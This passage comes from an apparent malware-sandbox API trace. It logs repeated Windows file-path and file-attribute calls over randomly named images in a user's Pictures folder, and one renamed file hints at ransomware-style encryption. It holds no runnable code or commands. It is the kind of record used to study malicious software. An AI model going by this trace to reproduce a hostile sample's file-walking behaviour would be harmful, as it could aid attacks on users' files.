halpmcxz\\pictures\\vditubh\\vw3n_4l.jpg.0l0lqq")) returned 1 [0254.824] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.824] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0254.826] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\vxcyubaxt8kr.bmp"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x442f37b0, ftCreationTime.dwHighDateTime=0x1d5de76, ftLastAccessTime.dwLowDateTime=0x191a0410, ftLastAccessTime.dwHighDateTime=0x1d5e411, ftLastWriteTime.dwLowDateTime=0x191a0410, ftLastWriteTime.dwHighDateTime=0x1d5e411, nFileSizeHigh=0x0, nFileSizeLow=0x2811)) returned 1 [0254.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0254.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0254.826] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\vxcyubaxt8kr.bmp"), fInfoLevelId=0x0, lpFileInformation=0x6d34638 | out: lpFileInformation=0x6d34638*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x442f37b0, ftCreationTime.dwHighDateTime=0x1d5de76, ftLastAccessTime.dwLowDateTime=0x191a0410, ftLastAccessTime.dwHighDateTime=0x1d5e411, ftLastWriteTime.dwLowDateTime=0x191a0410, ftLastWriteTime.dwHighDateTime=0x1d5e411, nFileSizeHigh=0x0, nFileSizeLow=0x2811)) returned 1 [0254.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0254.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0254.826] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\vxcyubaxt8kr.bmp"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x442f37b0, ftCreationTime.dwHighDateTime=0x1d5de76, ftLastAccessTime.dwLowDateTime=0x191a0410, ftLastAccessTime.dwHighDateTime=0x1d5e411, ftLastWriteTime.dwLowDateTime=0x191a0410, ftLastWriteTime.dwHighDateTime=0x1d5e411, nFileSizeHigh=0x0, nFileSizeLow=0x2811)) returned 1 [0254.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0254.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\VXCYUbAXT8KR.bmp", lpFilePart=0x0) returned 0x3f [0254.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0254.833] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\wkltg-gzsxrj9thv7zme.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1519fd0, ftCreationTime.dwHighDateTime=0x1d5e5da, ftLastAccessTime.dwLowDateTime=0xb86e64d0, ftLastAccessTime.dwHighDateTime=0x1d5df83, ftLastWriteTime.dwLowDateTime=0xb86e64d0, ftLastWriteTime.dwHighDateTime=0x1d5df83, nFileSizeHigh=0x0, nFileSizeLow=0xfd14)) returned 1 [0254.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0254.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0254.833] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\wkltg-gzsxrj9thv7zme.jpg"), fInfoLevelId=0x0, lpFileInformation=0x6d364c4 | out: lpFileInformation=0x6d364c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1519fd0, ftCreationTime.dwHighDateTime=0x1d5e5da, ftLastAccessTime.dwLowDateTime=0xb86e64d0, ftLastAccessTime.dwHighDateTime=0x1d5df83, ftLastWriteTime.dwLowDateTime=0xb86e64d0, ftLastWriteTime.dwHighDateTime=0x1d5df83, nFileSizeHigh=0x0, nFileSizeLow=0xfd14)) returned 1 [0254.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0254.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0254.833] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\wkltg-gzsxrj9thv7zme.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1519fd0, ftCreationTime.dwHighDateTime=0x1d5e5da, ftLastAccessTime.dwLowDateTime=0xb86e64d0, ftLastAccessTime.dwHighDateTime=0x1d5df83, ftLastWriteTime.dwLowDateTime=0xb86e64d0, ftLastWriteTime.dwHighDateTime=0x1d5df83, nFileSizeHigh=0x0, nFileSizeLow=0xfd14)) returned 1 [0254.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0254.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26d8ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0254.834] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\wkltg-gzsxrj9thv7zme.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26ddbc | out: lpFileInformation=0x26ddbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1519fd0, ftCreationTime.dwHighDateTime=0x1d5e5da, ftLastAccessTime.dwLowDateTime=0xb86e64d0, ftLastAccessTime.dwHighDateTime=0x1d5df83, ftLastWriteTime.dwLowDateTime=0xb86e64d0, ftLastWriteTime.dwHighDateTime=0x1d5df83, nFileSizeHigh=0x0, nFileSizeLow=0xfd14)) returned 1 [0254.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0254.834] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0254.834] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\wkltg-gzsxrj9thv7zme.jpg"), fInfoLevelId=0x0, lpFileInformation=0x6d39c08 | out: 